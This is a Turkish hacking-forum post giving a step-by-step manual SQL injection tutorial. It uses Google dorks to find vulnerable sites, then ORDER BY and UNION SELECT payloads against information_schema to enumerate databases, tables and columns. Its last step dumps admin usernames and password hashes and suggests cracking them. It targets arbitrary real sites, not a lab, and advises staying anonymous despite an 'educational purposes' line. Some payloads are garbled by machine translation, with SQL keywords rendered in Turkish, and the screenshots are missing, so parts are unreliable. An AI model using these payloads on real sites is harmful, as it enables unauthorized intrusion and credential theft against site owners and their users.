Manuel SQL Enjeksiyonu [DETAYLI ANLATIM] (1 Viewer)

Dj_Taleh

Old User / Hack3r

SOYTARI
Credits
0
Rating - 0%
MerHaba Spy Ailemiz Nbr? :)
Dostlar Umarim Yenilerin işine Yarar

Manuel SQL Enjeksiyonu.

Adım 1: Bir hedef bulma.
Web korsanlığına yeni başlayanlar için google dorks kullanmak gerçekten yardımcı olabilir. İşte birkaçı:

inurl:index.php?id= inurl:news.php?id= inurl:gallery.php?id= inurl:category.php?id= inurl:games.php?id= inurl:forum.php?tid= inurl:newsletter.php?id= inurl:content.php?id=

Bir bağlantıya tıklayın, yüklenmesine izin verin. Düzgün yüklenirse, sonuna bir ' koyun, buna benzer bir şey elde edeceksiniz:

NORMAL:

iAtBE.jpg

TEST:

QIn9S.jpg
Kullanılabilir!

Adım 2: Sütun Sayısını Bulun.

Şimdi, ' işaretini kaldırın ve ekleyin: order by 5--
Bir hata alırsanız, harika, yine de okumaya devam edin. Değilse, okumaya devam etmelisiniz.
Şuna benzer bir ekran görene kadar 5 eklemeye devam edin:

gbtLX.jpg

Ardından, çalışan 5 ile çalışmayan 5 arasında, yüklenmeyene veya bir hata verene kadar siparişi her seferinde 1'e kadar numaralandırın (6'ya göre sırala, 7'ye göre sırala, vb.). Tabii ki şansım yaver gitti, ON error 10 hatasını aldım. Dolayısıyla 9 kolon var!

3. Adım: Hangi sütunun savunmasız olduğunu bulun.

id='den sonra bir -
Bu önemli!
Ardından, sayıdan sonra yazın, birlik tümü seç 1,2,3,4,5,6,7,8,9--
Açıkça, sitenizde yalnızca 4 sütun varsa, birlik tümü seç 1,2 olur, 3,4
Hangi sütunun doğrudan savunmasız olduğu size söylenecek.

Örnek:

Qyqwg.jpg

Adım 4: MySQL sürümünü edinin

Güvenlik açığı bulunan sütun için sayıyı @@sürüm ile değiştirin

Örnek:

wyLyA.jpg

Şu andan itibaren, örnekler benimki gibi gösterilecek, bunu sitenizle çalışacak şekilde değiştirin!

Adım 5: Veritabanlarını Alın

Bilgilerinizi şu şekilde değiştirin: union all select 1,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata--

5stxB.jpg

Ardından group_concat(schema_name) öğesini database() olarak değiştirin, bu size mevcut veritabanınızı verecektir.

Adım 6: Tabloları Alın

Sonraki:

birleşim, bilgi_schema.tables'den 1,group_concat(table_name),3,4,5,6,7,8'i seçin, burada table_schema=database()--

Size tablo listesini vermelidir. Imgur çalışmayı bıraktı, bu yüzden düşünmeye başlayın!;D

admin adında bir masam var. Tabi lan!

Adım 7: Columns union'ı alın
info_schema.columns'dan 1,group_concat(column_name),3,4,5,6,7,8 öğesini seçin, burada table_schema=database()--

Biri adminUser ve diğeri adminPassword adlı bazı sütunlar aldım .

Adım 8: Yönetici Girişleri!
Neredeyse bitti!

union all 1,group_concat(adminUser,0x3a,adminPassword,0x3a),3,4,5,6,7,8 from admin--

Unutmayın, parantez içindeki sütunlar, tablonun sonunda

Rastgele görünen dizeleri alırsanız harfler ve sayılar, bu md5, bu yüzden google'da "md5'in şifresini çevrimiçi çöz" veya Cain ve Abel'ı alın

:p

Bu sadece eğitim amaçlıdır. Yaptıklarından sen sorumlusun, ama anonim kalmayı unutma!

Users who are viewing this thread